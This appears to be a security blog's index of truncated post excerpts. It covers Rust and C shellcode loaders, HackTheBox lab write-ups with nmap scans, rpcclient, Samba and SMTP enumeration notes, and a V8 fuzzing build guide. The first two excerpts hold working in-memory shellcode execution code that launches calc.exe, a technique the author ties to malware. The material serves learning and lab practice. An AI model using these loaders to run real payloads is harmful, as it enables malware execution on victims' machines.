Motivation I want to how to allocate memory on windows and execute code in buffers. winapi winapi provides raw FFI bindings to all of Windows API. So, I will use this crate. code When run command cargo run, popup calc.exe use std::mem::transmute; use winapi::um::errhandlingapi::GetLastError; use winapi::um::memoryapi::VirtualAlloc; use winapi::um::processthreadsapi::CreateThread; use winapi::um::synchapi::WaitForSingleObject; fn main() { let buffer: [u8; 276] = [ 0xfc, 0x48, 0x83, 0xe4, 0xf0, 0xe8, 0xc0, 0x00, 0x00, 0x00, 0x41, 0x51, 0x41, 0x50, 0x52, 0x51, 0x56, 0x48, 0x31, 0xd2, 0x65, 0x48, 0x8b, 0x52, 0x60, 0x48, 0x8b, 0x52, 0x18, 0x48, 0x8b, 0x52, 0x20, 0x48, 0x8b, 0x72, 0x50, 0x48, 0x0f, 0xb7, 0x4a, 0x4a, 0x4d, 0x31, 0xc9, 0x48, 0x31, 0xc0, 0xac, 0x3c, 0x61, 0x7c, 0x02, 0x2c, 0x20, 0x41, 0xc1, 0xc9, 0x0d, 0x41, 0x01, 0xc1, 0xe2, 0xed, 0x52, 0x41, 0x51, 0x48, 0x8b, 0x52, 0x20, 0x8b, 0x42, 0x3c, 0x48, 0x01, 0xd0, 0x8b, 0x80, 0x88, 0x00, 0x00, 0x00, 0x48, 0x85, 0xc0, 0x74, 0x67, 0x48, 0x01, 0xd0, 0x50, 0x8b, 0x48, 0x18, 0x44, 0x8b, 0x40, 0x20, 0x49, 0x01, 0xd0, 0xe3, 0x56, 0x48, 0xff, 0xc9, 0x41, 0x8b, 0x34, 0x88, 0x48, 0x01, 0xd6, 0x4d, 0x31, 0xc9, 0x48, 0x31, 0xc0, 0xac, 0x41, 0xc1, 0xc9, 0x0d, 0x41, 0x01, 0xc1, 0x38, 0xe0, 0x75, 0xf1, 0x4c, 0x03, 0x4c, 0x24, 0x08, 0x45, 0x39, 0xd1, 0x75, 0xd8, 0x58, 0x44, 0x8b, 0x40, 0x24, 0x49, 0x01, 0xd0, 0x66, 0x41, 0x8b, 0x0c, 0x48, 0x44, 0x8b, 0x40, 0x1c, 0x49, 0x01, 0xd0, 0x41, 0x8b, 0x04, 0x88, 0x48, 0x01, 0xd0, 0x41, 0x58, 0x41, 0x58, 0x5e, 0x59, 0x5a, 0x41, 0x58, 0x41, 0x59, 0x41, 0x5a, 0x48, 0x83, 0xec, 0x20, 0x41, 0x52, 0xff, 0xe0, 0x58, 0x41, 0x59, 0x5a, 0x48, 0x8b, 0x12, 0xe9, 0x57, 0xff, 0xff, 0xff, 0x5d, 0x48, 0xba, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x48, 0x8d, 0x8d, 0x01, 0x01, 0x00, 0x00, 0x41, 0xba, 0x31, 0x8b, 0x6f, 0x87, 0xff, 0xd5, 0xbb, 0xe0, 0x1d, 0x2a, 0x0a, 0x41, 0xba, 0xa6, 0x95, 0xbd, 0x9d, 0xff, 0xd5, 0x48, 0x83, 0xc4, 0x28, 0x3c, 0x06, 0x7c, 0x0a, 0x80, 0xfb, 0xe0, 0x75, 0x05, 0xbb, 0x47, 0x13, 0x72, 0x6f, 0x6a, 0x00, 0x59, 0x41, 0x89, 0xda, 0xff, 0xd5, 0x63, 0x61, 0x6c, 0x63, 0x2e, 0x65, 0x78, 0x65, 0x00, ]; unsafe { let baseptr = VirtualAlloc(std::ptr::null_mut(), buffer....

What is Ldap LDAP stands for Lightweight Directory Access Protocol. It is an open and platform-independent protocol used for accessing and maintaining directory services over a network. Directory services store and organize information, such as user names, passwords, email addresses, and other attributes, in a hierarchical structure. LDAP is commonly used in client-server applications and network environments to facilitate centralized management of user authentication, authorization, and directory information. It allows clients to search, modify, and retrieve data from a directory server, which stores the directory information....

Shellcode One way for malware to embed code is to deploy shell code in memory. This time, we will check the method that works on Windows. Note that getchar() is used so that the debugger can attach to the process accordingly and check the memory. .text payload is the shellcode. To embed arbitrary shell code in a .text section, do the following. #include <windows.h> #include <stdio.h> #include <stdlib.h> #include <string.h> int main(void) { void * exec_mem; BOOL rv; HANDLE th; DWORD oldprotect = 0; // Shellcode in text section unsigned char payload[] = { 0x90, // NOP 0x90, // NOP 0xcc, // INT3 0xc3 // RET }; unsigned int payload_len = 4; // Allocate a memory buffer for payload exec_mem = VirtualAlloc(0, payload_len, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE); printf("%-20s : 0x%-016p\n", "payload addr", (void *)payload); printf("%-20s : 0x%-016p\n", "exec_mem addr", (void *)exec_mem); // Copy payload to new buffer RtlMoveMemory(exec_mem, payload, payload_len); // Make new buffer as executable rv = VirtualProtect(exec_mem, payload_len, PAGE_EXECUTE_READ, &oldprotect); printf("\nHit me!...

This post is writeup of the HackTheBox machine. Brain**ck https://app.hackthebox.com/machines/Brainfuck Nmap Nmap result $ nmap -sC -sV 10.10.10.17 Starting Nmap 7.93 ( https://nmap.org ) at 2023-05-09 06:39 EDT Nmap scan report for 10.10.10.17 Host is up (0.072s latency). Not shown: 995 filtered tcp ports (no-response) PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.1 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 94d0b334e9a537c5acb980df2a54a5f0 (RSA) | 256 6bd5dc153a667af419915d7385b24cb2 (ECDSA) |_ 256 23f5a333339d76d5f2ea6971e34e8e02 (ED25519) 25/tcp open smtp Postfix smtpd |_smtp-commands: brainfuck, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN 110/tcp open pop3 Dovecot pop3d |_pop3-capabilities: SASL(PLAIN) TOP RESP-CODES UIDL CAPA AUTH-RESP-CODE PIPELINING USER 143/tcp open imap Dovecot imapd |_imap-capabilities: LITERAL+ AUTH=PLAINA0001 capabilities LOGIN-REFERRALS have post-login listed SASL-IR IDLE ENABLE OK more IMAP4rev1 Pre-login ID 443/tcp open ssl/http nginx 1....

Nibbles IP address : 10.10.10.75 Nmap result $ nmap -sV -sT -sC 10.10.10.75 Starting Nmap 7.93 ( https://nmap.org ) at 2022-12-17 05:59 EST Nmap scan report for 10.10.10.75 Host is up (0.11s latency). Not shown: 998 closed tcp ports (conn-refused) PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 c4f8ade8f80477decf150d630a187e49 (RSA) | 256 228fb197bf0f1708fc7e2c8fe9773a48 (ECDSA) |_ 256 e6ac27a3b5a9f1123c34a55d5beb3de9 (ED25519) 80/tcp open http Apache httpd 2....

Nmap cheat sheet $ nmap <scan types> <options> <target> -snDisables port scanning. -oA tnetStores the results in all formats starting with the name ’tnet'. -iLPerforms defined scans against targets in provided ‘hosts.lst’ list. -PE Performs the ping scan by using ‘ICMP Echo requests’ against the target. –packet-trace Shows all packets sent and received --reasonDisplays the reason for specific result. --top-ports=10Scans the specified top ports that have been defined as most frequent....

RPC Client RPC client $ rpcclient -U "" 10.129.14.128Enter WORKGROUP\'s password: rpcclient$> rpcclient$> srvinfo DEVSMB Wk Sv PrQ Unx NT SNT DEVSM platform_id : 500 os version : 6.1 server type : 0x809a03 rpcclient$> enumdomainsname:[DEVSMB] idx:[0x0] name:[Builtin] idx:[0x1] rpcclient$> querydominfoDomain: DEVOPS Server: DEVSMB Comment: DEVSM Total Users: 2 Total Groups: 0 Total Aliases: 0 Sequence No: 1632361158 Force Logoff: -1 Domain Server State: 0x1 Server Role: ROLE_DOMAIN_PDC Unknown 3: 0x1 rpcclient$> netshareenumallnetname: print$ remark: Printer Drivers path: C:\var\lib\samba\printers password: netname: home remark: INFREIGHT Samba path: C:\home\ password: netname: dev remark: DEVenv path: C:\home\sambauser\dev\ password: netname: notes remark: CheckIT path: C:\mnt\notes\ password: netname: IPC$ remark: IPC Service (DEVSM) path: C:\tmp password: rpcclient$> netsharegetinfo notesnetname: notes remark: CheckIT path: C:\mnt\notes\ password: type: 0x0 perms: 0 max_uses: -1 num_uses: 1 revision: 1 type: 0x8004: SEC_DESC_DACL_PRESENT SEC_DESC_SELF_RELATIVE DACL ACL Num ACEs: 1 revision: 2 --- ACE type: ACCESS ALLOWED (0) flags: 0x00 Specific bits: 0x1ff Permissions: 0x101f01ff: Generic all access SYNCHRONIZE_ACCESS WRITE_OWNER_ACCESS WRITE_DAC_ACCESS READ_CONTROL_ACCESS DELETE_ACCESS SID: S-1-1-0 rpcclient$> enumdomusersuser:[mrb3n] rid:[0x3e8] user:[cry0l1t3] rid:[0x3e9] rpcclient$> queryuser 0x3e9 User Name : cry0l1t3 Full Name : cry0l1t3 Home Drive : \\devsmb\cry0l1t3 Dir Drive : Profile Path: \\devsmb\cry0l1t3\profile Logon Script: Description : Workstations: Comment : Remote Dial : Logon Time : Do, 01 Jan 1970 01:00:00 CET Logoff Time : Mi, 06 Feb 2036 16:06:39 CET Kickoff Time : Mi, 06 Feb 2036 16:06:39 CET Password last set Time : Mi, 22 Sep 2021 17:50:56 CEST Password can change Time : Mi, 22 Sep 2021 17:50:56 CEST Password must change Time: Do, 14 Sep 30828 04:48:05 CEST unknown_2[0....

Samba samba $ cat /etc/samba/smb.conf | grep -v "#\|\;"[global] workgroup = DEV.INFREIGHT.HTB server string = DEVSMB log file = /var/log/samba/log.%m max log size = 1000 logging = file panic action = /usr/share/samba/panic-action %d server role = standalone server obey pam restrictions = yes unix password sync = yes passwd program = /usr/bin/passwd %u passwd chat = *Enter\snew\s*\spassword:* %n\n *Retype\snew\s*\spassword:* %n\n *password\supdated\ssuccessfully* . pam password change = yes map to guest = bad user usershare allow guests = yes [printers] comment = All Printers browseable = no path = /var/spool/samba printable = yes guest ok = no read only = yes create mask = 0700 [print$] comment = Printer Drivers path = /var/lib/samba/printers browseable = yes read only = yes guest ok = no 設定 説明 [sharename] ネットワーク共有の名前。 workgroup = WORKGROUP/DOMAIN クライアントがクエリを実行したときに表示されるワークグループ。 path = /path/here/ ユーザーにアクセス権を付与するディレクトリ。 server string = STRING 接続が開始されたときに表示される文字列。 unix password sync = yes UNIX パスワードを SMB パスワードと同期しますか?...

SMTP SMTP 送信と通信は、SMTP サーバーにユーザーの要求を実行させる特別なコマンドによっても行われます。 指示 説明 AUTH PLAIN AUTH は、クライアントの認証に使用されるサービス拡張です。 HELO クライアントはそのコンピューター名でログインし、セッションを開始します。 MAIL FROM クライアントは電子メールの送信者に名前を付けます。 RCPT TO クライアントは、電子メールの受信者に名前を付けます。 DATA クライアントが電子メールの送信を開始します。 RSET クライアントは開始された送信を中止しますが、クライアントとサーバー間の接続は維持します。 VRFY クライアントは、メールボックスがメッセージ転送に使用できるかどうかを確認します。 EXPN クライアントは、このコマンドでメールボックスがメッセージングに使用できるかどうかも確認します。 NOOP クライアントは、タイムアウトによる切断を防ぐために、サーバーに応答を要求します。 QUIT クライアントはセッションを終了します。 $ telnet 10.129.14.128 25 Trying 10.129.14.128... Connected to 10.129.14.128. Escape character is '^]'. 220 ESMTP Server HELO mail1.inlanefreight.htb 250 mail1.inlanefreight.htb EHLO mail1 250-mail1.inlanefreight.htb 250-PIPELINING 250-SIZE 10240000 250-ETRN 250-ENHANCEDSTATUSCODES 250-8BITMIME 250-DSN 250-SMTPUTF8 250 CHUNKING $ telnet 10.129.14.128 25 Trying 10.129.14.128... Connected to 10....

I built v8 to run fuzzing in AFL. First, install depot_tools using the link below. And then download the v8 source code. https://v8.dev/docs/source-code Next, create an afl directory in the v8/third_party directory and download the contents of the following link. https://chromium.googlesource.com/chromium/src/+/refs/heads/master/third_party/afl/ Next, go to the v8 directory and execute the following command. gn gen out/libfuzzer '--args=use_afl=true is_asan=true optimize_for_fuzzing = true ' --check ninja -C out/libfuzzer d8 afl-fuzz -D -i third_party/afl/src/testcases/others/js/ -o fuzzout -M fuzz1 ....